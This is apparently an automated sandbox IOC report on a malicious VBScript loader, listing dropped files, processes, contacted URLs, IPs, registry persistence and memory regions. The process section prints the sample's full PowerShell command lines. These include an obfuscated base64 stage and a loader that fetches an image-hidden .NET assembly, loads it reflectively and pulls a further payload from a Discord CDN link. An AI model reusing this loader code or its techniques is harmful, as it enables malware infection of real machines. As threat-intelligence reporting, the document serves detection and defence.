IOC Report
las.vbs

loading gif

Files

File Path
Type
Category
Malicious
las.vbs
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
initial sample
malicious
C:\ProgramData\cognitivo.vbs
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rXYIP[1].txt
ASCII text, with very long lines (12366), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jcsx1le.0mg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d30ticws.fno.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1h4ezea.1ds.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaw1jmdp.pdc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxgq5xv3.yzv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmxvjc2k.jb2.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreZgBmDgTreDUDgTreZDgTreDgTreyDgTreDEDgTreOQBlDgTreDgDgTreZQBiDgTreDDgTreDgTreZgDgTre4DgTreDYDgTreMQDgTrewDgTreDDgTreDgTreZQDgTre5DgTreDDgTreDgTreMwBjDgTreDgDgTreODgTreDgTre3DgTreGEDgTreNQBiDgTreGUDgTreYQDgTrezDgTreGYDgTreZDgTreDgTrexDgTreGEDgTreOQDgTre3DgTreDIDgTreYQDgTre2DgTreDkDgTreNgDgTrexDgTreGIDgTreNgDgTre4DgTreDQDgTreMgDgTrexDgTreDDgTreDgTreOQBkDgTreDgDgTreZQDgTre4DgTreDkDgTreNgDgTre0DgTreDQDgTreMQDgTre5DgTreGIDgTreNDgTreDgTre9DgTreG0DgTreaDgTreDgTremDgTreGEDgTreNgDgTreyDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGEDgTreZQDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreNQDgTrewDgTreDEDgTreNDgTreDgTre1DgTreDIDgTreMgDgTrezDgTreDMDgTreMQDgTrexDgTreDEDgTreMgDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYwBvDgTreGcDgTrebgBpDgTreHQDgTreaQB2DgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://paste.ee/d/rXYIP
188.114.96.3
malicious
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
188.114.97.3
malicious
https://paste.ee/
unknown
malicious
https://www.google.com
unknown
https://paste.ee/d/rXYIPY
unknown
https://cdn.discordapp.com/attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff&
162.159.134.233
https://paste.ee/d/rXYIPm
unknown
https://www.google.com;
unknown
https://paste.ee/d/rXYIPl
unknown
https://analytics.paste.ee;
unknown
https://analytics.paste.ee
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
There are 7 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
malicious
uploaddeimagens.com.br
188.114.97.3
malicious
cdn.discordapp.com
162.159.134.233

IPs

IP
Domain
Country
Malicious
188.114.97.3
uploaddeimagens.com.br
European Union
malicious
188.114.96.3
paste.ee
European Union
malicious
162.159.134.233
cdn.discordapp.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
225658E5000
heap
page read and write
897D67E000
stack
page read and write
22564EF3000
heap
page read and write
22564EF3000
heap
page read and write
225651A0000
heap
page read and write
2256592E000
heap
page read and write
210C12E0000
heap
page read and write
210C309C000
heap
page read and write
25EAE741000
heap
page read and write
25EAE760000
heap
page read and write
22564EA7000
heap
page read and write
210C12DC000
heap
page read and write
22564EF3000
heap
page read and write
225659B0000
heap
page read and write
245F2740000
trusted library allocation
page read and write
2851DA43000
heap
page read and write
25EAE755000
heap
page read and write
245F266A000
heap
page read and write
897D353000
stack
page read and write
210C1448000
heap
page read and write
22564EF3000
heap
page read and write
1D402801000
trusted library allocation
page read and write
22565BCE000
heap
page read and write
A2C48FE000
stack
page read and write
25EAE767000
heap
page read and write
22564EF3000
heap
page read and write
2256594B000
heap
page read and write
245F2620000
heap
page read and write
25EAE7C6000
heap
page read and write
25EAE74F000
heap
page read and write
28503953000
heap
page read and write
25EAC9B2000
heap
page read and write
210C3097000
heap
page read and write
25EAE784000
heap
page read and write
245F4660000
heap
page execute and read and write
285058F5000
trusted library allocation
page read and write
25EAC9EB000
heap
page read and write
28505942000
trusted library allocation
page read and write
245804A0000
trusted library allocation
page read and write
285061CA000
trusted library allocation
page read and write
24590001000
trusted library allocation
page read and write
7FFD9B55D000
trusted library allocation
page execute and read and write
24580411000
trusted library allocation
page read and write
24580459000
trusted library allocation
page read and write
DDBF5FD000
stack
page read and write
DDBF47E000
unkown
page read and write
210C2D24000
heap
page read and write
24580596000
trusted library allocation
page read and write
210C1445000
heap
page read and write
22564E8A000
heap
page read and write
210C3142000
heap
page read and write
25EAE93D000
heap
page read and write
24580001000
trusted library allocation
page read and write
25EAE75B000
heap
page read and write
245F26E7000
heap
page read and write
F96BAFE000
stack
page read and write
22563185000
heap
page read and write
2256316F000
heap
page read and write
210C2D20000
heap
page read and write
210C12D3000
heap
page read and write
225659BE000
heap
page read and write
25EAC9E3000
heap
page read and write
210C12A0000
heap
page read and write
245F2674000
heap
page read and write
285038D0000
heap
page read and write
22565BCF000
heap
page read and write
25EAE840000
heap
page read and write
210C3076000
heap
page read and write
210C3084000
heap
page read and write
245F26B7000
heap
page read and write
25EAE760000
heap
page read and write
245F44A9000
heap
page read and write
25EAE772000
heap
page read and write
210C326D000
heap
page read and write
210C326E000
heap
page read and write
22564F2B000
heap
page read and write
7FFD9B710000
trusted library allocation
page execute and read and write
25EAC930000
heap
page read and write
7FFD9B560000
trusted library allocation
page read and write
25EAC9DE000
heap
page read and write
225659D0000
heap
page read and write
225658E5000
heap
page read and write
22564EF3000
heap
page read and write
225658E3000
heap
page read and write
22565BCE000
heap
page read and write
245F4503000
heap
page read and write
25EAE81F000
heap
page read and write
210C3090000
heap
page read and write
22562FF0000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
25EAE740000
heap
page read and write
F96B6FE000
stack
page read and write
897DDBB000
stack
page read and write
225658ED000
heap
page read and write
7FFD9B554000
trusted library allocation
page read and write
DDBF93C000
stack
page read and write
210C3115000
heap
page read and write
1D403201000
trusted library allocation
page read and write
245F268A000
heap
page read and write
210C30D1000
heap
page read and write
2851DC90000
heap
page read and write
24580134000
trusted library allocation
page read and write
225658EE000
heap
page read and write
28503B50000
heap
page readonly
285059E4000
trusted library allocation
page read and write
210C1200000
heap
page read and write
7FFD9B606000
trusted library allocation
page read and write
25EAC9EB000
heap
page read and write
25EAE815000
heap
page read and write
225658E0000
heap
page read and write
25EAC9DB000
heap
page read and write
210C12C9000
heap
page read and write
210C3090000
heap
page read and write
28503981000
heap
page read and write
210C12D0000
heap
page read and write
F96B77E000
stack
page read and write
22564E9A000
heap
page read and write
245F4692000
heap
page read and write
225659C7000
heap
page read and write
7FFD9B610000
trusted library allocation
page execute and read and write
897D8FD000
stack
page read and write
25EAC9E5000
heap
page read and write
25EACA8A000
heap
page read and write
25EAE3D0000
heap
page read and write
22564EF3000
heap
page read and write
22565CD1000
heap
page read and write
22565CDB000
heap
page read and write
210C144E000
heap
page read and write
7FFD9B552000
trusted library allocation
page read and write
DDBFABF000
stack
page read and write
22563185000
heap
page read and write
245F2885000
heap
page read and write
25EAE760000
heap
page read and write
22565CD9000
heap
page read and write
210C309B000
heap
page read and write
54AF5FE000
stack
page read and write
28503A34000
heap
page read and write
210C12D0000
heap
page read and write
2851DB30000
heap
page read and write
210C12C7000
heap
page read and write
22564EA1000
heap
page read and write
22563185000
heap
page read and write
210C30E6000
heap
page read and write
210C1234000
heap
page read and write
22564F2B000
heap
page read and write
28505905000
trusted library allocation
page read and write
897D87E000
stack
page read and write
22564EF3000
heap
page read and write
245F24C0000
heap
page read and write
7FFD9B710000
trusted library allocation
page execute and read and write
225652A0000
heap
page read and write
25EB02B0000
heap
page read and write
22564EF3000
heap
page read and write
1D401401000
trusted library allocation
page read and write
25EAE815000
heap
page read and write
2851DAB5000
heap
page read and write
245F2830000
heap
page execute and read and write
BCFCDFE000
stack
page read and write
22563185000
heap
page read and write
28503B20000
trusted library allocation
page read and write
25EAE941000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
245F271A000
heap
page read and write
22565B61000
heap
page read and write
28503B40000
trusted library allocation
page read and write
25EAE9E5000
heap
page read and write
28503985000
heap
page read and write
210C3156000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
25EAE77F000
heap
page read and write
210C12D3000
heap
page read and write
225630F5000
heap
page read and write
210C3270000
heap
page read and write
25EAE767000
heap
page read and write
25EAE747000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
22564E80000
heap
page read and write
225659AF000
heap
page read and write
2851DAF3000
heap
page read and write
245F2648000
heap
page read and write
24580481000
trusted library allocation
page read and write
225654D0000
trusted library allocation
page read and write
210C11B0000
heap
page read and write
22565090000
remote allocation
page read and write
F96BDBE000
stack
page read and write
210C3085000
heap
page read and write
2458011A000
trusted library allocation
page read and write
25EAE7DA000
heap
page read and write
210C3074000
heap
page read and write
25EAE3F0000
heap
page read and write
210C1440000
heap
page read and write
210C3101000
heap
page read and write
25EACA85000
heap
page read and write
22565BCE000
heap
page read and write
2458011D000
trusted library allocation
page read and write
25EAE74C000
heap
page read and write
210C1229000
heap
page read and write
22564B30000
heap
page read and write
24580732000
trusted library allocation
page read and write
245F47A0000
heap
page read and write
210C12B5000
heap
page read and write
210C3271000
heap
page read and write
2256592E000
heap
page read and write
25EAE760000
heap
page read and write
25EAC92B000
heap
page read and write
7FFD9B740000
trusted library allocation
page execute and read and write
DDBF77F000
stack
page read and write
7FFD9B600000
trusted library allocation
page read and write
210C12A9000
heap
page read and write
210C3170000
